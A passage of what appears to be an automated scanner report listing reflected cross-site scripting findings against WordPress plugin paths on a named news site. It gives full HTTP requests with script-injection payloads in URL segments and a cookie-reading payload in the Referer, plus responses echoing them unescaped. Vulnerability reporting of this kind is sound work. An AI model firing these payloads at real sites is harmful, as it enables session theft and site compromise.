Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/world-cup-predictor/js/wcp.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57f83"><script>alert(1)</script>8a5da68fe58 was submitted in the REST URL parameter 3. This input was echoed as 57f83\"><script>alert(1)</script>8a5da68fe58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/world-cup-predictor57f83"><script>alert(1)</script>8a5da68fe58/js/wcp.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:25 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/world-cup-predictor57f83\"><script>alert(1)</script>8a5da68fe58/js/wcp.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.305. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/js/wcp.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/world-cup-predictor/js/wcp.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c721b"><script>alert(1)</script>a6f1a1b3a49 was submitted in the REST URL parameter 4. This input was echoed as c721b\"><script>alert(1)</script>a6f1a1b3a49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/world-cup-predictor/jsc721b"><script>alert(1)</script>a6f1a1b3a49/wcp.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:18 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/world-cup-predictor/jsc721b\"><script>alert(1)</script>a6f1a1b3a49/wcp.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.306. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/js/wcp.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/world-cup-predictor/js/wcp.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d0d4"><script>alert(1)</script>b5fc31a812c was submitted in the REST URL parameter 5. This input was echoed as 1d0d4\"><script>alert(1)</script>b5fc31a812c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/world-cup-predictor/js/wcp.js1d0d4"><script>alert(1)</script>b5fc31a812c?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:48 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/world-cup-predictor/js/wcp.js1d0d4\"><script>alert(1)</script>b5fc31a812c?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.307. http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-css.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/wp-email/email-css.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67c5d"><script>alert(1)</script>5b6741c2669 was submitted in the REST URL parameter 1. This input was echoed as 67c5d\"><script>alert(1)</script>5b6741c2669 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content67c5d"><script>alert(1)</script>5b6741c2669/plugins/wp-email/email-css.css?ver=2.50 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=ec89cdfb92a6c430a9d2c331418f8fd9
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:09:53 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:09:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content67c5d\"><script>alert(1)</script>5b6741c2669/plugins/wp-email/email-css.css?ver=2.50'; }); return true;" >
...[SNIP]...

4.308. http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-css.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/wp-email/email-css.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a251b"><script>alert(1)</script>b73b13473f6 was submitted in the REST URL parameter 2. This input was echoed as a251b\"><script>alert(1)</script>b73b13473f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsa251b"><script>alert(1)</script>b73b13473f6/wp-email/email-css.css?ver=2.50 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=ec89cdfb92a6c430a9d2c331418f8fd9
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:08 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginsa251b\"><script>alert(1)</script>b73b13473f6/wp-email/email-css.css?ver=2.50'; }); return true;" >
...[SNIP]...

4.309. http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-css.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/wp-email/email-css.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b248"><script>alert(1)</script>d0dbf28864a was submitted in the REST URL parameter 3. This input was echoed as 6b248\"><script>alert(1)</script>d0dbf28864a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-email6b248"><script>alert(1)</script>d0dbf28864a/email-css.css?ver=2.50 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=ec89cdfb92a6c430a9d2c331418f8fd9
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:13 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/wp-email6b248\"><script>alert(1)</script>d0dbf28864a/email-css.css?ver=2.50'; }); return true;" >
...[SNIP]...

4.310. http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-css.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/wp-email/email-css.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cfb3"><script>alert(1)</script>9effc6a49f was submitted in the REST URL parameter 4. This input was echoed as 7cfb3\"><script>alert(1)</script>9effc6a49f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-email/email-css.css7cfb3"><script>alert(1)</script>9effc6a49f?ver=2.50 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=ec89cdfb92a6c430a9d2c331418f8fd9
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:41 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/wp-email/email-css.css7cfb3\"><script>alert(1)</script>9effc6a49f?ver=2.50'; }); return true;" >
...[SNIP]...

4.311. http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-js.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/wp-email/email-js.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61ca3"><script>alert(1)</script>a1e0e6d05fc was submitted in the REST URL parameter 1. This input was echoed as 61ca3\"><script>alert(1)</script>a1e0e6d05fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content61ca3"><script>alert(1)</script>a1e0e6d05fc/plugins/wp-email/email-js.js?ver=2.50 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=ec89cdfb92a6c430a9d2c331418f8fd9
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:38 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content61ca3\"><script>alert(1)</script>a1e0e6d05fc/plugins/wp-email/email-js.js?ver=2.50'; }); return true;" >
...[SNIP]...

4.312. http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-js.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/wp-email/email-js.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58873"><script>alert(1)</script>5657a8bf0e8 was submitted in the REST URL parameter 2. This input was echoed as 58873\"><script>alert(1)</script>5657a8bf0e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins58873"><script>alert(1)</script>5657a8bf0e8/wp-email/email-js.js?ver=2.50 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=ec89cdfb92a6c430a9d2c331418f8fd9
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:39 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins58873\"><script>alert(1)</script>5657a8bf0e8/wp-email/email-js.js?ver=2.50'; }); return true;" >
...[SNIP]...

4.313. http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-js.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/wp-email/email-js.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62b9e"><script>alert(1)</script>064da61cc06 was submitted in the REST URL parameter 3. This input was echoed as 62b9e\"><script>alert(1)</script>064da61cc06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-email62b9e"><script>alert(1)</script>064da61cc06/email-js.js?ver=2.50 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=ec89cdfb92a6c430a9d2c331418f8fd9
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:00 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/wp-email62b9e\"><script>alert(1)</script>064da61cc06/email-js.js?ver=2.50'; }); return true;" >
...[SNIP]...

4.314. http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-js.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/wp-email/email-js.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eee58"><script>alert(1)</script>1fe76ddfa4b was submitted in the REST URL parameter 4. This input was echoed as eee58\"><script>alert(1)</script>1fe76ddfa4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-email/email-js.jseee58"><script>alert(1)</script>1fe76ddfa4b?ver=2.50 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=ec89cdfb92a6c430a9d2c331418f8fd9
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:26 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/wp-email/email-js.jseee58\"><script>alert(1)</script>1fe76ddfa4b?ver=2.50'; }); return true;" >
...[SNIP]...

4.315. http://starscene.dailystar.com.lb/wp-content/themes/options/library/js/options.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/options/library/js/options.js

Issue detail

